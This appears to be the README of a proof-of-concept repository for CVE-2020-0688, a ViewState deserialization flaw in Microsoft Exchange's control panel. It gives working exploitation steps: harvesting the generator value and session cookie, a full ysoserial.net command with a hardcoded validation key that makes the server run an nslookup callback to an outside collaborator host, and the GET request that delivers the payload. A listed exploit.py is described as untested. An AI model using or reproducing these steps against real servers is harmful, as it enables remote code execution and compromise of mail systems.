cve-2020-0688# cve-2020-0688
cve-2020-0688
Login with a user with an email address privliage is nothing to worry about.
Grab - `__VIEWSTATEGENERATOR` from page source
Grab - the value of `ASP.NET_SessionId` cookie for viewstateuserkey value
[Download YSO Here](https://github.com/pwntester/ysoserial.net/releases/download/v1.32/ysoserial-1.32.zip)
```
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup teasdas.myburpcollab.net" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy
```
GET TO:
```
https://localhost/ecp/default.aspx?__VIEWSTATEGENERATOR=<generator>&__VIEWSTATE=<ViewState>
```
The Exploit.py is untested and need a demo system to fire up and play with.
[4.0K] /data/pocs/7e5478752b41ec0abeb3b092f277b9a16fdff76b
├── [1.9K] exploit.py
└── [ 826] README.md
0 directories, 2 files